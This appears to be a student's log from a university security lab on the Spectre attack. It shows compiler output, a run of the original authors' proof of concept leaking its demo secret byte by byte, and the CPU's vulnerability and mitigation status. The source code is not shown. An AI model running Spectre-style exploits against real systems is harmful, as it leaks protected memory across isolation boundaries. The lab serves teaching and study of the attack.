SSI 2024/25
Lab 1. Spectre attack Lab

JMCruz compiling and running of the C code from Spectre's authors:
	(https://arxiv.org/abs/1801.01203)

============================================================================================
--------------------------------------------------------------------------------------------

jmcruz$ cc -Wall spectre-originalAuthors.c
spectre-originalAuthors.c: In function ‘readMemoryByte’:
spectre-originalAuthors.c:76:42: warning: pointer targets in passing argument 1 of ‘__rdtscp’ differ in signedness [-Wpointer-sign]
   76 |                         time1 = __rdtscp(&junk);
      |                                          ^~~~~
      |                                          |
      |                                          int *
In file included from /usr/lib/gcc/x86_64-linux-gnu/11/include/x86gprintrin.h:33,
                 from /usr/lib/gcc/x86_64-linux-gnu/11/include/x86intrin.h:27,
                 from spectre-originalAuthors.c:16:
/usr/lib/gcc/x86_64-linux-gnu/11/include/ia32intrin.h:122:25: note: expected ‘unsigned int *’ but argument is of type ‘int *’
  122 | __rdtscp (unsigned int *__A)
      |           ~~~~~~~~~~~~~~^~~
spectre-originalAuthors.c:79:42: warning: pointer targets in passing argument 1 of ‘__rdtscp’ differ in signedness [-Wpointer-sign]
   79 |                         time2 = __rdtscp(&junk) - time1; /* Compute elapsed time */
      |                                          ^~~~~
      |                                          |
      |                                          int *
In file included from /usr/lib/gcc/x86_64-linux-gnu/11/include/x86gprintrin.h:33,
                 from /usr/lib/gcc/x86_64-linux-gnu/11/include/x86intrin.h:27,
                 from spectre-originalAuthors.c:16:
/usr/lib/gcc/x86_64-linux-gnu/11/include/ia32intrin.h:122:25: note: expected ‘unsigned int *’ but argument is of type ‘int *’
  122 | __rdtscp (unsigned int *__A)
      |           ~~~~~~~~~~~~~~^~~

jmcruz$ ./a.out
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffffdfe8... Unclear: 0x54='T' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdfe9... Unclear: 0x68='h' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdfea... Unclear: 0x65='e' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdfeb... Unclear: 0x20=' ' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdfec... Unclear: 0x4D='M' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdfed... Unclear: 0x61='a' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffdfee... Unclear: 0x67='g' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdfef... Unclear: 0x69='i' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdff0... Unclear: 0x63='c' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdff1... Unclear: 0x00='?' score=998(second best: 0x20 score=998)
Reading at malicious_x = 0xffffffffffffdff2... Unclear: 0x57='W' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffdff3... Unclear: 0x6F='o' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffdff4... Unclear: 0x72='r' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffdff5... Unclear: 0x64='d' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdff6... Unclear: 0x73='s' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdff7... Unclear: 0x20=' ' score=999(second best: 0x00 score=997)
Reading at malicious_x = 0xffffffffffffdff8... Unclear: 0x61='a' score=999(second best: 0x00 score=995)
Reading at malicious_x = 0xffffffffffffdff9... Unclear: 0x72='r' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdffa... Unclear: 0x65='e' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdffb... Unclear: 0x20=' ' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdffc... Unclear: 0x53='S' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffdffd... Unclear: 0x71='q' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdffe... Unclear: 0x75='u' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffdfff... Unclear: 0x65='e' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe000... Unclear: 0x61='a' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe001... Unclear: 0x6D='m' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffe002... Unclear: 0x69='i' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe003... Unclear: 0x73='s' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffe004... Unclear: 0x68='h' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe005... Unclear: 0x20=' ' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe006... Unclear: 0x4F='O' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe007... Unclear: 0x73='s' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe008... Unclear: 0x73='s' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffe009... Unclear: 0x69='i' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffe00a... Unclear: 0x66='f' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe00b... Unclear: 0x72='r' score=999(second best: 0x00 score=998)
Reading at malicious_x = 0xffffffffffffe00c... Unclear: 0x61='a' score=999(second best: 0x00 score=999)
Reading at malicious_x = 0xffffffffffffe00d... Unclear: 0x67='g' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffe00e... Unclear: 0x65='e' score=999(second best: 0x00 score=996)
Reading at malicious_x = 0xffffffffffffe00f... Unclear: 0x2E='.' score=999(second best: 0x00 score=996)
jmcruz$

--------------------------------------------------------------------------------------------
============================================================================================


Recovered Secret:
	The Magic?Words are Squeamish Ossifrage.


============================================================================================
--------------------------------------------------------------------------------------------

jmcruz$ uname -a
Linux ricjoa 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux

jmcruz$ lscpu
Architecture:             x86_64
  CPU op-mode(s):         32-bit, 64-bit
  Address sizes:          39 bits physical, 48 bits virtual
  Byte Order:             Little Endian
CPU(s):                   8
  On-line CPU(s) list:    0-7
Vendor ID:                GenuineIntel
  Model name:             Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
    CPU family:           6
    Model:                60
    Thread(s) per core:   2
    Core(s) per socket:   4
    Socket(s):            1
    Stepping:             3
    CPU max MHz:          4000,0000
    CPU min MHz:          800,0000
    BogoMIPS:             7183.33
    Flags:                fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr
                          sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nop
                          l xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3
                           sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f
                          16c rdrand lahf_lm abm cpuid_fault epb invpcid_single pti ssbd ibrs ibpb stibp tpr_shadow vnmi fle
                          xpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt dtherm ida
                           arat pln pts md_clear flush_l1d
Virtualization features:
  Virtualization:         VT-x
Caches (sum of all):
  L1d:                    128 KiB (4 instances)
  L1i:                    128 KiB (4 instances)
  L2:                     1 MiB (4 instances)
  L3:                     8 MiB (1 instance)
NUMA:
  NUMA node(s):           1
  NUMA node0 CPU(s):      0-7
Vulnerabilities:
  Gather data sampling:   Not affected
  Itlb multihit:          KVM: Mitigation: VMX disabled
  L1tf:                   Mitigation; PTE Inversion; VMX conditional cache flushes, SMT vulnerable
  Mds:                    Mitigation; Clear CPU buffers; SMT vulnerable
  Meltdown:               Mitigation; PTI
  Mmio stale data:        Unknown: No mitigations
  Reg file data sampling: Not affected
  Retbleed:               Not affected
  Spec rstack overflow:   Not affected
  Spec store bypass:      Mitigation; Speculative Store Bypass disabled via prctl and seccomp
  Spectre v1:             Mitigation; usercopy/swapgs barriers and __user pointer sanitization
  Spectre v2:             Mitigation; Retpolines; IBPB conditional; IBRS_FW; STIBP conditional; RSB filling; PBRSB-eIBRS Not
                           affected; BHI Not affected
  Srbds:                  Mitigation; Microcode
  Tsx async abort:        Not affected
jmcruz$
--------------------------------------------------------------------------------------------
============================================================================================